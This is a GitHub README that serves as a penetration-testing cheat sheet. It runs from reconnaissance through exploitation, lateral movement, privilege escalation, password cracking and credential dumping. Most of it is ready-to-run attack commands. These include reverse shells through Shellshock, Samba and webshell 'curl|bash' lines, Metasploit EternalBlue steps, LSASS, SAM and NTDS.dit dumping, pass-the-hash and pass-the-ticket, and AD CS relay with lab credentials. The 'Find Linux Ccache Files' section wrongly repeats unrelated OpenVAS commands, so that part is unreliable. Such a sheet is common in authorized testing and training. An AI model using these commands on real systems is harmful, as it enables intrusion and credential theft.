jwardsmith/Penetration-Testing

GitHub: jwardsmith/Penetration-Testing

A cheat sheet of commands and tools covering the full penetration testing workflow, helping security teams quickly carry out information gathering, exploitation and lateral movement.

Stars: 7 | Forks: 2

# Penetration Testing

## Overview

1. - [Passive Enumeration](#1---passive-enumeration)
2. - [Active Enumeration](#2---active-enumeration)
3. - [Exploitation](#3---exploitation)
4. - [Lateral Movement](#4---lateral-movement)
5. - [Privilege Escalation](#5---privilege-escalation)
6. - [Brute Force](#6---brute-force)
7. - [Password Dumping](#7---password-dumping)
8. - [File Transfers](#8---file-transfers)
9. - [Restricted Shell Escapes](#9---restricted-shell-escapes)
10. - [Shells](#10---shells)
11. - [Evasion](#11---evasion)
12. - [Online Resources](#12---online-resources)
13. - [Browser Plugins](#13---browser-plugins)
14. - [Exploits](#14---exploits)
15. - [Exploit Research](#15---exploit-research)

## #1. - Passive Enumeration

- Searchcode
```
https://searchcode.com/
```
- Shodan
```
https://www.shodan.io/
$ for i in $(cat ip-addresses.txt);do shodan host $i;done
```
- Certificate Search
```
https://crt.sh/
$ curl -s https://crt.sh/\?q\=\&output\=json | jq .
$ curl -s https://crt.sh/\?q\=\&output\=json | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\\n/,"\n");}1;' | sort -u
```
- Google Dorks
```
intext: inurl:amazonaws.com
intext: inurl:blob.core.windows.net
```
- Whois
```
https://domain.glass/
```
- Cloud Bucket Search
```
https://buckets.grayhatwarfare.com/
```

## #2. - Active Enumeration

- Nmap
```
$ sudo nmap --script-updatedb
$ nmap -sn
$ nmap -sC -sV -p- -Pn -A
$ nmap -sC -sV -p- -Pn -A -sU
$ nmap --top-ports=100
$ nmap --script vuln
$ nmap -sV --script banner
$ nmap -sV --packet-trace --reason
$ nmap -S -e tun0
$ nmap -D RND:5
$ nmap --source-port
$ nmap -oA scan
$ xsltproc target.xml -o target.html
```
- Nessus
```
$ dpkg -i Nessus-8.15.1-ubuntu910_amd64.deb
$ sudo systemctl start nessusd.service
https://localhost:8834
https://raw.githubusercontent.com/eelsivart/nessus-report-downloader/master/nessus6-report-downloader.rb
./nessus_downloader.rb
```
- OpenVAS
```
$ sudo apt-get install gvm && openvas
$ gvm-setup
$ gvm-start
https://github.com/TheGroundZero/openvasreporting
$ python3 -m openvasreporting -i report-2bf466b5-627d-4659-bea6-1758b43235b1.xml -f xlsx
```
- Netcat
```
$ nc -nv
```
- FTP (Port 21)
```
$ ftp (anonymous:anonymous)
ftp> dir
ftp> cd
ftp> get
ftp> put
ftp> exit
$ openssl s_client -connect :21 -starttls ftp
$ wget -m --no-passive ftp://anonymous:anonymous@
```
- SSH (Port 22)
```
$ ssh @
$ ssh @@
$ ssh @ -p
$ chmod 600 id_rsa
$ ssh -i id_rsa @
$ ssh @ -o PreferredAuthentications=password
$ ssh-audit.py
```
- Telnet (Port 23)
```
$ telnet
```
- SMTP (Port 25)
```
$ telnet 25
VRFY root
```
- DNS (udp/Port 53)
```
$ dig ns @
$ dig mx @
$ dig txt @
$ dig CH TXT version.bind
$ dig soa @
$ dig any @
$ dig axfr @
$ for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub. @ | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
$ dnsenum --dnsserver --enum -p 0 -s 0 -o found_subdomains.txt -f /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt
$ for i in $(cat subdomainlist.txt);do host $i | grep "has address" | grep | cut -d" " -f4 >> ip-addresses.txt;done
```
- TFTP (udp/Port 69)
```
$ tftp
tftp> get
tftp> put
```
- HTTP/HTTPS (Port 80/443)
```
Right-Click -> View Page Source
https:///robots.txt
$ gobuster dir -w -u
$ gobuster dir -w -u -x php,html
$ gobuster vhost -w -u
$ gobuster dns -w -d
$ ffuf -u /FUZZ -w
$ curl -IL
$ curl -H 'User-agent: zerodiumsystem("curl ");'
$ curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp//443 0>&1" http:///cgi-bin/user.sh
$ feroxbuster -w -u
$ wfuzz -c -w -u http://FUZZ.
$ nikto -h
$ eyewitness -f --web
$ whatweb
$ curl -v -X OPTIONS
$ curl http:// --upload-file test.txt
$ curl -X PUT http:///test.txt -d @test.txt
$ curl -X PUT http:///test.txt --data-binary @cmdasp.aspx
$ curl -X PUT http:///test.txt -d @cmdasp.aspx
$ curl -X MOVE -H 'Destination:http:///cmdasp.aspx' http:///test.txt
$ davtest -url http://
$ cadaver http://
dav:/ put cmdasp.aspx cmdasp.txt
dav:/ put cmdasp.txt cmdasp.aspx
```
- POP3 (Port 110)
```
$ telnet 110
USER admin
PASS admin
LIST
RETR 1
```
- RPCBIND (Port 111)
```
$ rpcinfo -p
```
- MSRPC (Port 135)
```
$ wmiexec.py :""@ ""
```
- SMB (Port 137/139/445)
```
$ smbclient -N -L
$ smbclient -L
$ smbclient -L -U
$ smbclient \\\\\\c$
$ smbclient \\\\\\c$ -U
$ smbclient /// -k -c ls -no-pass
$ smbmap -H
$ smbmap -H -u -p
smb: \> logon "/=`nc -e /bin/sh`"
smb: \> !ls
$ rpcclient -U ""
$ for i in $(seq 500 1100);do rpcclient -N -U "" -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
$ samrdump.py
msf> use auxiliary/scanner/smb/smb_version
msf> use auxiliary/scanner/smb/smb_login
msf> use auxiliary/scanner/smb/smb_ms17_010
msf> use exploit/windows/smb/ms17_010_psexec
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> use exploit/windows/smb/ms08_067_netapi
msf> use exploit/multi/samba/usermap_script
msf> use exploit/windows/smb/psexec
$ enum4linux -a
$ enum4linux-ng.py -A
$ crackmapexec smb --shares
$ crackmapexec smb --shares -u '' -p ''
$ crackmapexec smb --shares -u -p ''
$ crackmapexec winrm -u -p ''
```
- IMAP (Port 143)
```
$ telnet 143
1 LOGIN username password
1 LIST "" *
1 FETCH all
```
- SNMP (udp/Port 161)
```
$ snmpwalk -v 2c -c
$ snmpwalk -v 2c -c public 1.3.6.1.2.1.1.5.0
$ snmpwalk -v 2c -c private 1.3.6.1.2.1.1.5.0
$ onesixtyone -c /opt/useful/seclists/Discovery/SNMP/snmp.txt
$ braa @:.1.*
```
- R-Services (Port 512/513/514)
```
$ rlogin -l
$ rwho
$ rusers -al
```
- IPMI (udp/Port 623)
```
msf> use auxiliary(scanner/ipmi/ipmi_version)
msf> use auxiliary(scanner/ipmi/ipmi_dumphashes)
```
- CUPS (Port 631)
```
$ cupsctl ErrorLog="/etc/shadow"
$ curl http://:631/admin/log/error_log?
use multi/escalate/cups_root_file_read
```
- Rsync (Port 873)
```
$ rsync -av --list-only rsync://
$ rsync -av --list-only rsync:///
$ rsync rsync:////
$ rsync -av rsync://
```
- IMAPS (Port 993)
```
$ curl -k 'imaps://' --user :
$ openssl s_client -connect :imaps
```
- POP3S (Port 995)
```
$ openssl s_client -connect :pop3s
```
- MSSQL (Port 1433)
```
$ python3 mssqlclient.py /@ -windows-auth
SQL> SELECT name from sys.databases
SQL> SELECT is_srvrolemember('sysadmin');
SQL> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
SQL> EXEC xp_cmdshell "whoami";
```
- Oracle TNS (Port 1521)
```
$ wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-basic-linux.x64-21.4.0.0.0dbru.zip
$ wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip
$ sudo mkdir -p /opt/oracle
$ sudo unzip -d /opt/oracle instantclient-basic-linux.x64-21.4.0.0.0dbru.zip
$ sudo unzip -d /opt/oracle instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip
$ export LD_LIBRARY_PATH=/opt/oracle/instantclient_21_4:$LD_LIBRARY_PATH
$ export PATH=$LD_LIBRARY_PATH:$PATH
$ source ~/.bashrc
$ cd ~
$ git clone https://github.com/quentinhardy/odat.git
$ cd odat/
$ pip install python-libnmap
$ git submodule init
$ git submodule update
$ pip3 install cx_Oracle
$ sudo apt-get install python3-scapy -y
$ sudo pip3 install colorlog termcolor passlib python-libnmap
$ sudo apt-get install build-essential libgmp-dev -y
$ pip3 install pycryptodome
$ ./odat.py -h
$ ./odat.py all -s
$ ./odat.py utlfile -s -d -U -P --sysdba --putFile
$ sqlplus /@/
$ sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
$ sqlplus /@/ as sysdba
SQL> SELECT table_name from all_tables;
SQL> SELECT * from user_role_privs;
SQL> select name, password from sys.user$;
```
- NFS (Port 2049)
```
$ showmount -e
$ sudo mount -t nfs : -o nolock
$ sudo umount
$ sudo useradd -u
```
- MySQL (Port 3306)
```
$ mysql -h -u root
MySQL [(none)]> SELECT version();
MySQL [(none)]> SHOW databases;
MySQL [(none)]> USE ;
MySQL [(none)]> SHOW tables;
MySQL [(none)]> SELECT * FROM ;
MySQL [(none)]> SELECT * from where = "";
```
- RDP (Port 3389)
```
$ xfreerdp /v:
$ xfreerdp /v: /u:Administrator
$ xfreerdp /v: /u:Administrator /d:
$ freerdp /v: /cert:ignore /u:Administrator /p:''
$ rdp-sec-check.pl
```
- PostgreSQL (Port 5432)
```
$ psql -h -U -p
=# \l
=# \c secrets
=# \dt
=# SELECT * FROM ;
```
- WinRM (Port 5985)
```
$ evil-winrm -i -u -p
$ evil-winrm -i -u -H
```
- X11 (Port 6000)
```
$ cat .Xauthority | base64
$ echo AQAADHN<...SNIP...>S0xAoNm/oZZ4/ | base64 -d > /tmp/.Xauthority
$ export XAUTHORITY=/tmp/.Xauthority
$ w
$ xwd -root -screen -silent -display :0 > /tmp/screen.xwd
$ convert screen.xwd screen.png
```
- Redis (Port 6379)
```
$ redis-cli -h
:6379> select
:6379> keys *
:6379> get
```
- MongoDB (Port 27017/27117)
```
$ ./mongo mongodb://:27017
> show dbs;
> use ;
> show collections;
> db..find().pretty();
$ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
$ mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("")},{$set:{"x_shadow":""}})'
```

## #3. - Exploitation

- Searchsploit
```
$ searchsploit
```
- Metasploit
```
$ sudo msfdb init
$ msfconsole
msf6 > loadpath /usr/share/metasploit-framework/modules/
msf6 > reload_all
msf6 > show exploits
msf6 > show payloads
msf6 > search exploit eternalblue
msf6 > use exploit/windows/smb/ms17_010_psexec
msf6 exploit(windows/smb/ms17_010_psexec) > info
msf6 exploit(windows/smb/ms17_010_psexec) > options
msf6 exploit(windows/smb/ms17_010_psexec) > advanced
msf6 exploit(windows/smb/ms17_010_psexec) > show targets
msf6 exploit(windows/smb/ms17_010_psexec) > show encoders
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST tun0
msf6 exploit(windows/smb/ms17_010_psexec) > check
msf6 exploit(windows/smb/ms17_010_psexec) > set autorunscript migrate -f
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
msf6 exploit(windows/smb/ms17_010_psexec) > exploit -e shikata_ga_nai
msf6 > sessions
msf6 > sessions -i 1
msf6 > jobs
msf6 > jobs kill 1
msf6 > route print
msf6 > route add 192.168.1.0/24 11
msf6 > use multi/manage/autoroute
```
- Meterpreter
```
meterpreter > sysinfo
meterpreter > getuid
meterpreter > background
meterpreter > search -f *pass*.txt
meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\Users\\Public
meterpreter > download c:\\Windows\\system32\\calc.exe /tmp/calc.exe
meterpreter > shell
meterpreter > getprivs
meterpreter > use priv
meterpreter > hashdump
meterpreter > lsa_dump_sam
meterpreter > lsa_dump_secrets
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > list_tokens -g
meterpreter > impersonate_token \
meterpreter > steal_token
meterpreter > drop_token
meterpreter > execute -f -i
meterpreter > execute -f -i -H -t
meterpreter > rev2self
meterpreter > getsystem
meterpreter > ps
meterpreter > migrate
meterpreter > load kiwi
meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.1.110
```
- Local File Inclusion (LFI)
```
http:///?page=../../../../../../../../windows/system32/drivers/etc/hosts
```
- Remote File Inclusion (RFI)
```
sudo responder -I
http:///?page=///somefile
```
- Server-Side Template Injection (SSTI)
```
${7*7}
```
- Insecure Direct Object Reference (IDOR)
```
http:///data/0
http:///data/1
http:///data/2
```
- Webshell
```
http:///shell.php?cmd=id
http:///shell.php?cmd=curl%20:8000/shell.sh|bash
```
- Sqlmap
```
$ sqlmap -u '' --cookie="PHPSESSID="
$ sqlmap -u '' --cookie="PHPSESSID=" --os-shell
```
- Rogue-JNDI
```
$ java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,} | {base64,-d}|{bash,-i}" --hostname ""
```
- Tomcat
```
http://:/manager/html
tomcat:s3cret
use exploit/multi/http/tomcat_mgr_upload
```
- PRTG Network Monitor
```
C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.dat
https://github.com/shk0x/PRTG-Network-Monitor-RCE/blob/master/prtg-exploit.sh
use exploit/windows/http/prtg_authenticated_rce
```

## #4. - Lateral Movement

- Local Port Forwarding
```
$ ssh -L 1234:localhost:5432 @
```
- Dynamic Port Forwarding
```
$ ssh -D 1234 @
```
- Proxychains
```
Edit /etc/proxychains4.conf
Edit [ProxyList] e.g. 127.0.0.1 9050
$ proxychains
# Running Nmap through ProxyChains requires the -sT option
$ sudo proxychains -q nmap -sT -Pn 172.16.119.13 --open
```
- Proxychains with Kerberos
```
Edit /etc/proxychains4.conf
Edit [ProxyList] e.g. 127.0.0.1 9050
# To use a Kerberos ticket we need to specify the target machine name (not its IP address) and use the -k option. If prompted for a password, we can also include the -no-pass option
$ proxychains -k
```
- Chisel
```
https://github.com/jpillora/chisel
$ sudo ./chisel server -p 8000 --reverse
$ ./chisel client :8000 R:631:127.0.0.1:631
```
- Socat
```
$ socat tcp-listen:9090,fork tcp:127.0.0.1:631 &
```
- Meterpreter
```
meterpreter> portfwd add -l 8082 -p 631 -r 127.0.0.1
```
- PsExec
```
$ python psexec.py :@
$ python psexec.py @
```
- Runas
```
C:\> runas /savecred /user: cmd
```
- PowerShell Remoting
```
PS C:\> Enter-PSSession -ComputerName
```
- Evil-WinRM
```
$ evil-winrm -i -u -p
$ evil-winrm -i -u -H
```
- Evil-WinRM with Kerberos
```
# During installation you will be prompted for the Kerberos realm name. Use the domain name and the KDC
$ sudo apt-get install krb5-user -y
OR
# If it is already installed, edit this file
$ cat /etc/krb5.conf
$ proxychains evil-winrm -i -r
```
- Mimikatz Pass-The-Hash (PTH)
```
C:\> mimikatz.exe privilege::debug "sekurlsa::pth /user: /rc4: /domain: /run:cmd.exe" exit
```
- Invoke-TheHash (PTH)
```
PS C:\> Import-Module .\Invoke-TheHash.psd1
PS C:\> Invoke-SMBExec -Target -Domain -Username -Hash -Command "" -Verbose
PS C:\> Invoke-WMIExec -Target -Domain -Username -Hash -Command "" -Verbose
```
- Impacket (PTH)
```
$ impacket-psexec @ -hashes :
$ impacket-wmiexec @ -hashes :
$ impacket-atexec @ -hashes :
$ impacket-smbexec @ -hashes :
```
- Netexec (PTH)
```
$ netexec smb -u -d . -H
$ netexec smb -u -d . -H -x whoami
```
- Evil-winrm (PTH)
```
$ evil-winrm -i -u -H
$ evil-winrm -i -u -H
```
- Xfreerdp (PTH)
```
# Disable Restricted Admin mode on the target system
C:\> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
$ xfreerdp /v: /u: /pth:
```
- List Tickets
```
C:\> klist
C:\> Rubeus.exe klist
mimikatz # kerberos::list
```
- Mimikatz Export Tickets
```
C:\> mimikatz.exe privilege::debug "sekurlsa::tickets /export"
C:\> dir *.kirbi
```
- Rubeus Export Tickets
```
C:\> Rubeus.exe dump /nowrap
```
- Mimikatz Pass-The-Ticket (PTT)
```
mimikatz # kerberos::ptt ""
```
- Rubeus Pass-The-Ticket (PTT)
```
C:\> Rubeus.exe ptt /ticket:
C:\> Rubeus.exe ptt /ticket:
```
- Convert .kirbi to Base64 Format
```
PS C:\> [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Tools\"))
```
- Mimikatz OverPass-The-Hash (OPTH)
```
# Mimikatz needs administrative rights to perform the Pass the Key/OverPass the Hash attack, whereas Rubeus does not
mimikatz # sekurlsa::pth /domain: /user: /ntlm:
```
- Rubeus OverPass-The-Hash (OPTH)
```
# Mimikatz needs administrative rights to perform the Pass the Key/OverPass the Hash attack, whereas Rubeus does not
C:\> Rubeus.exe asktgt /domain: /user: /aes256: /nowrap
```
- Rubeus OverPass-The-Hash (OPTH) -> Rubeus Pass-The-Ticket (PTT)
```
C:\> Rubeus.exe asktgt /domain: /user: /rc4: /ptt
C:\> Rubeus.exe asktgt /domain: /user: /aes256: /ptt
```
- Rubeus Sacrificial Process
```
C:\> Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
```
- Check if Linux is Domain Joined
```
$ realm list
$ ps -ef | grep -i "winbind\|sssd"
```
- Find Linux KeyTab Files
```
# To use a keytab file we must have read and write (rw) permissions on the file
$ find / -name *keytab* -ls 2>/dev/null
```
- Find Linux KeyTab Files in Cron Jobs
```
$ crontab -l
```
- List Linux KeyTab File Information
```
$ klist -k -t /opt/specialfiles/carlos.keytab
```
- Impersonate a User with a Linux KeyTab File
```
# kinit is case sensitive, so use the principal name exactly as klist displays it. In this case the username is lowercase and the domain name is uppercase
# To keep the ticket of the current session, save a copy of the ccache file referenced by the KRB5CCNAME environment variable before importing the keytab
$ kinit carlos@ -k -t /opt/specialfiles/carlos.keytab
```
- Extract Linux KeyTab Hashes
```
https://github.com/sosdave/KeyTabExtract
$ python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
```
- Find Linux Ccache Files
```
$ sudo apt-get install gvm && openvas
$ gvm-setup
$ gvm-start
https://github.com/TheGroundZero/openvasreporting
$ python3 -m openvasreporting -i report-2bf466b5-627d-4659-bea6-1758b43235b1.xml -f xlsx
```
- Impersonate a User with a Linux Ccache File
```
# cp /tmp/krb5cc_647401106_I8I133 .
# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
# klist
```
- Convert a Linux Ccache File to a Windows .kirbi File
```
https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py
$ impacket-ticketConverter krb5cc_647401106_I8I133
```
- Convert a Windows .kirbi File to a Linux Ccache File
```
https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py
$ impacket-ticketConverter krb5cc_647401106_I8I133
```
- Linikatz
```
https://github.com/CiscoCXSecurity/linikatz
$ ./linikatz.sh
```
- AD CS NTLM Relay Attack (ESC8)
```
$ impacket-ntlmrelayx -t http://10.129.234.110/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication
```
- PrinterBug
```
https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py
$ python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.109 10.10.16.12
```
- Pass-The-Certificate (PTC)
```
https://github.com/dirkjanm/PKINITtools/blob/master/gettgtpkinit.py
$ python3 -m venv .venv
$ source .venv/bin/activate
$ pip3 install -r requirements.txt
# If you get an error saying "Error detecting the version of libcrypto", installing the oscrypto library resolves it
$ pip3 install -I git+https://github.com/wbond/oscrypto.git
$ python3 gettgtpkinit.py -cert-pfx ../krbrelayx/DC01\$.pfx -dc-ip 10.129.234.109 'inlanefreight.local/dc01$' /tmp/dc.ccache
```
- Shadow Credentials (msDS-KeyCredentialLink)
```
https://github.com/ShutdownRepo/pywhisker
$ pywhisker --dc-ip 10.129.234.109 -d INLANEFREIGHT.LOCAL -u wwhite -p 'package5shores_topher1' --target jpinkman --action add
$ python3 gettgtpkinit.py -cert-pfx ../eFUVVTPf.pfx -pfx-pass 'bmRH4LK7UwPrAOfvIx6W' -dc-ip 10.129.234.109 INLANEFREIGHT.LOCAL/jpinkman /tmp/jpinkman.ccache
```

## #5. - Privilege Escalation

- Sudo
```
$ sudo -l
$ sudo -u /bin/bash
```
- SUID
```
https://github.com/Anon-Exploiter/SUID3NUM
```
- WinPEAS
```
https://github.com/carlospolop/PEASS-ng
```
- LinPEAS
```
https://github.com/carlospolop/PEASS-ng
```
- LinEnum
```
https://github.com/rebootuser/LinEnum
```
- Linuxprivchecker
```
https://github.com/sleventyeleven/linuxprivchecker
```
- Capabilities
```
$ getcap -r / 2>/dev/null
CAP_SETUID
```
- Python
```
>>> import os
>>> os.setuid(0)
>>> os.system("/bin/bash")
$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```
- Seatbelt
```
https://github.com/GhostPack/Seatbelt
```
- JAWS
```
https://github.com/411Hall/JAWS
```
- Weak Services
```
C:\> sc.exe config binPath=C:\Windows\Temp\nc.exe -e cmd.exe "
C:\> sc.exe stop
C:\> sc.exe start
```
- Cron Jobs
```
$ ls /etc/crontab
$ ls /etc/cron.d
$ ls /var/spool/cron/crontabs/root
```
- Vulnerable Software
```
$ dpkg -l
C:\> dir "C:\Program Files"
C:\> dir "C:\Program Files (x86)"
```
- Leaked Credentials
```
$ cat .bash_history
PS C:\> Get-Content (Get-PSReadlineOption).HistorySavePath
```
- SSH Key Login
```
$ cat /home/user/.ssh/id_rsa
$ cat /root/.ssh/id_rsa
$ chmod 600 id_rsa
$ ssh @ -i id_rsa
```
- SSH Authorized Keys
```
$ ssh-keygen -f key
$ cat key.pub
$ echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
$ ssh @ -i key
```
- Whoami
```
C:\> whoami /priv
```
- Windows Exploit Suggester
```
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
(On Kali)
$ ./windows-exploit-suggester.py --update
$ install python-xlrd
$ pip install xlrd --upgrade
feed it "systeminfo" input, and point it to the microsoft database
$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
```
- Metasploit
```
msf> use post/multi/recon/local_exploit_suggester
```

## #6. - Brute Force

- Cewl
```
$ cewl https://www.example.com -d 4 -m 6 --lowercase -w example.wordlist
```
- Username-Anarchy
```
https://github.com/urbanadventurer/username-anarchy
$ ./username-anarchy -i listoffirstandlastnames.txt
```
- Kerbrute Username Enumeration
```
$ ./kerbrute_linux_amd64 userenum --dc --domain names.txt
```
- Netexec
```
$ netexec ssh -u usernames.txt -p passwords.txt
$ netexec winrm -u usernames.txt -p passwords.txt
$ netexec smb -u -p --shares
$ netexec smb --local-auth -u -p --sam
$ netexec smb --local-auth -u -p --lsa
$ netexec smb -u -p --ntds
$ netexec smb -u -p -M ntdsutil
$ nxc smb -u -p --spider IT --content --pattern "passw"
```
- PCredz
```
$ ./Pcredz -f demo.pcapng -t -v
```
- HashID
```
$ hashid
$ hashid -j
$ hashid -m
```
- Example Hashes
```
https://openwall.info/wiki/john/sample-hashes
https://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
https://hashcat.net/wiki/doku.php?id=example_hashes
```
- Md5sum
```
$ echo -n | md5sum
```
- Sha1sum
```
$ echo -n | sha1sum
```
- Sha256sum
```
$ echo -n | sha256sum
```
- CrackStation
```
https://crackstation.net/
```
- John The Ripper
```
$ unshadow passwd.txt shadow.txt > unshadowed.txt
$ john -w=/usr/share/wordlists/rockyou.txt hash.txt
$ john --format -w=/usr/share/wordlists/rockyou.txt hash.txt
$ john --single hash.txt
$ john --incremental hash.txt
$ john --show hash.txt
```
- Hydra
```
# If you get an error, upgrade hydra
$ hydra -l '' -p '' ssh
$ hydra -L -P ssh://
$ hydra -L -P rdp://
$ hydra -L -P smb://
$ hydra -C ssh://
```
- File Information Formats
```
$ file
https://fileinfo.com/filetypes/encoded
https://fileinfo.com/filetypes/compressed
$ curl -s https://fileinfo.com/filetypes/compressed | html2text | awk '{print tolower($1)}' | grep "\." | tee -a compressed_ext.txt
```
- Zip2john
```
$ zip2john ZIP.zip > zip.hash
$ john --wordlist= zip.hash
$ john --show zip.hash
```
- Ssh2john
```
$ python3 ssh2john.py > ssh.hash
$ john --wordlist= ssh.hash
$ john --show ssh.hash
```
- Office2john
```
$ office2john.py Protected.docx > protected-docx.hash
$ john --wordlist= protected-docx.hash
$ john --show protected-docx.hash
```
- Pdf2john
```
$ pdf2john.pl PDF.pdf > pdf.hash
$ john --wordlist= pdf.hash
$ john --show pdf.hash
```
- Bitlocker2john
```
$ bitlocker2john -i Backup.vhd > backup.hashes
$ grep "bitlocker\$0" backup.hashes > backup.hash
$ hashcat -a 0 -m 22100 ''
# How to mount on Linux
$ sudo apt-get install dislocker
$ sudo mkdir -p /media/bitlocker
$ sudo mkdir -p /media/bitlockermount
$ sudo losetup -f -P Backup.vhd
$ sudo dislocker /dev/loop0p2 -u1234qwer -- /media/bitlocker
$ sudo mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount
$ cd /media/bitlockermount/
$ ls -la
$ sudo umount /media/bitlockermount
$ sudo umount /media/bitlocker
```
- Hashcat
```
$ hashcat --force password.list -r custom.rule --stdout > mut_password.list
$ hashcat -a 0 -m 0 hashes.txt
$ hashcat -a 0 -m 0
$ hashcat -a 0 -m 0 -r /usr/share/hashcat/rules/best64.rule
$ hashcat -a 3 -m 0 '?u?l?l?l?l?d?s'
$ hashcat -m 1000 ntlm-hashes.txt
$ hashcat -m 1000 --show
$ hashcat -m 1800 -a 0 unshadowed.txt -o /tmp/unshadowed.cracked
$ hashcat -m 500 -a 0 md5-hashes.txt
$ hashcat -m 2100 -a 0
$ hashcat -m 22100 bitlocker-hashes.txt -o backup.cracked
```
- Archive Cracking
```
$ file GZIP.gzip
$ for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null | tar xz;done
```
- Default Credentials
```
https://github.com/ihebski/DefaultCreds-cheat-sheet
$ pip3 install defaultcreds-cheat-sheet
$ creds search linksys
https://www.softwaretestinghelp.com/default-router-username-and-password-list/
```

## #7. - Password Dumping

- Windows Places to Look
```
Passwords in Group Policy in the SYSVOL share
Passwords in scripts in the SYSVOL share
Password in scripts on IT shares
Passwords in web.config files on dev machines and IT shares
Password in unattend.xml
Passwords in the AD user or computer description fields
KeePass databases (if we are able to guess or crack the master password)
Found on user systems and shares
Files with names like pass.txt, passwords.docx, passwords.xlsx found on user systems, shares, and Sharepoint
Keywords within files such as passw, user, token, key, and secret
Files with extensions commonly associated with stored credentials, such as .ini, .cfg, .env, .xlsx, .ps1, and .bat
Files with "interesting" names that include terms like config, user, passw, cred, or initial
Search for files containing the string \
```
- Linux Places to Look
```
Configuration files
Databases
Notes
Scripts
Cronjobs
SSH keys
History Files
Application logs
Event logs
Service logs
System logs
/var/log/messages      Generic system activity logs.
/var/log/syslog        Generic system activity logs.
/var/log/auth.log      (Debian) All authentication related logs.
/var/log/secure        (RedHat/CentOS) All authentication related logs.
/var/log/boot.log      Booting information.
/var/log/dmesg         Hardware and drivers related information and logs.
/var/log/kern.log      Kernel related warnings, errors and logs.
/var/log/faillog       Failed login attempts.
/var/log/cron          Information related to cron jobs.
/var/log/mail.log      All mail server related logs.
/var/log/httpd         All Apache related logs.
/var/log/mysqld.log    All MySQL server related logs.
Memory and cache
Keyrings e.g. browser stored credentials
```
- Findstr
```
C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
```
- Get-ChildItem
```
PS C:\> Get-ChildItem -Recurse -Include *.ext \\Server\Share | Select-String -Pattern "pass"
```
- Rundll32
```
PS C:\> Get-Process lsass
PS C:\> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
```
- Reg
```
# If we only want to dump the local users' hashes
C:\> reg.exe save hklm\sam C:\sam.save
C:\> reg.exe save hklm\system C:\system.save
# If we want the cached domain user credentials as well as the machine and user keys used for DPAPI
C:\> reg.exe save hklm\security C:\security.save
```
- Vssadmin
```
C:\> vssadmin CREATE SHADOW /For=C:
```
- NTDS.dit
```
C:\> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
```
- Windows Credential Manager
```
C:\> rundll32 keymgr.dll,KRShowKeyMgr
C:\> cmdkey /list
```
- Snaffler
```
https://github.com/SnaffCon/Snaffler
C:\> snaffler.exe -s
```
- PowerHuntShares
```
https://github.com/NetSPI/PowerHuntShares
PS C:\> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public
```
- MANSPIDER
```
https://github.com/blacklanternsecurity/MANSPIDER
$ docker run --rm -v ./manspider:/root/.manspider blacklanternsecurity/manspider -c '' -p '!'
```
- Pypykatz
```
$ pypykatz lsa minidump lsass.dmp
```
- Secretsdump
```
$ python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
$ impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL
$ impacket-secretsdump -k -no-pass -dc-ip -just-dc-user 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
```
- For Loops
```
$ for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib|fonts|share|core" ;done
$ for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc|lib");do echo -e "\nFile: " $i; grep "user|password|pass" $i 2>/dev/null | grep -v "\#";done
